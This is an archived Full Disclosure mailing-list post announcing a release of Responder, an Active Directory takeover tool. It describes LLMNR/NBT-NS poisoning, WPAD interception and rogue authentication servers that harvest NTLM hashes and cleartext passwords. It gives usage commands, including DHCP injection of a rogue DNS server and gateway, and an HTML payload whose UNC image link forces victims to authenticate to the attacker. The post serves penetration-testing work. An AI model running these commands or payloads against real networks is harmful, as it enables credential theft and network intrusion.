[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] [Tool] Responder v2.1.3
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] [Tool] Responder v2.1.3
- From: laurent gaffie <laurent.gaffie@xxxxxxxxx>
- Date: Fri, 28 Nov 2014 01:31:00 -0500
Responder is an Active Directory/Windows environment takeover tool suite
that can stealthily take over any default Active Directory environment
(including Windows 2012R2).
Most of the attacks in this tool are hard to detect and are highly
successful.
This version includes several enhancements:
- Analyze Mode: Figure out what kind of network you're dealing with before
doing anything:
- Map all workstations, domain forests, SQL servers within maximum 12
minutes, no user interaction; The Lanman module will query any hosts who
sent a Domain Master Browser announcement on the subnet to extract that
domain computer list and additional forests (
https://support.microsoft.com/KB/188001 -> "Only the PDC can be a domain
master browser").
- Figure out right away if you can use ICMP Redirect on that subnet
automatically.
- Figure out what's going on on this network; Is there a NAC/IPS/etc
trying to detect NBT-NS/LLMNR poisoning by sending random unexistant names?
- Allows a client/sysadmin to see if remediation was done properly.
- WPAD module; Choose if you want to intercept/inject traffic, get NTLMv1/2
hashes transparently or get a plain text sets of credentials.
This module is highly effecive and will gather any workstations sets of
credentials on a default environment with no user interaction (unless if
you're using -b for plaintext credentials).
- Kerberos server. Grab Kerberos AS-REQ Pre-Auth type 23 hashes (hashcat -m
7500).
- In-scope names or IPs to respond to (LLMNR/NBT-NS).
- Names or IPs (LLMNR/NBT-NS) you don't want to respond to (detected
NAC/IPS, out of scope multicast LLMNR, etc).
- Find MSSQL servers with the MSSQL Browser Service, one packet.
- Rogue servers included:
- SMB NTLMv1/2, Clear text passwords for NT4, and LM hashing downgrade
when the --lm option is set.
- MSSQL Auth server supports NTLMv1, LMv2 hashes and MSSQL plaintext
auth.
- HTTP Auth server NTLMv1/2 and basic.
- HTTPS NTLMv1/2 and basic auth.
- LDAP NTLMv1/2 and plaintest auth.
- FTP clear text credentials.
- POP3 clear text credentials.
- SMTP clear text credentials.
- IMAP clear text credentials.
Usage example:
./Responder.py -i YourIP -A
--> -A Analyze Mode, be a ninja; Port scanning is for losers.
./Responder.py -i YourIP -rFv
--> -r use workstation redirector for NBT-NS
--> -F force auth on wpad.dat files retrieval (highly efficient)
--> -v be verbose, print all queries.
./Responder.py -i YourIP -rw
--> -w enable WPAD server, grab requests and try to inject a custom html
payload into the HTML page sent to the victim. Default HTML is:
"<html><head></head><body><img src='file:\\\\\RespProxySrv\ssed\seyad.ico'
alt='Loading' height='1' width='2'></body></html>". If nothing is specified
in Responder.conf under "HTMLToServe" then nothing will be injected.
r
./FindSQLSrv.py
--> Map MSSQL servers on your subnet, one packet.
./DHCP.py -I eth0 -i 10.20.30.40 -d pwned.com -p 10.20.30.40 -s 10.20.30.1
-r 10.20.40.1
##DHCP INFORM##
--> -i Yourip
--> -d Domain to inject
--> -p Primary domain to inject
--> -s Secondary domain to inject
--> -r Gateway/Router to inject
##/DHCP INFORM##
--> (Optional -R) Respond to DHCP Requests, inject Linux/Windows clients
usually faster than the actual DHCP server.
Use this in conjunction with Responder's DNS server or Pcredz (
https://github.com/lgandx/PCredz)
Github: https://github.com/Spiderlabs/Responder
Twitter for the latest updates: https://twitter.com/PythonResponder
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/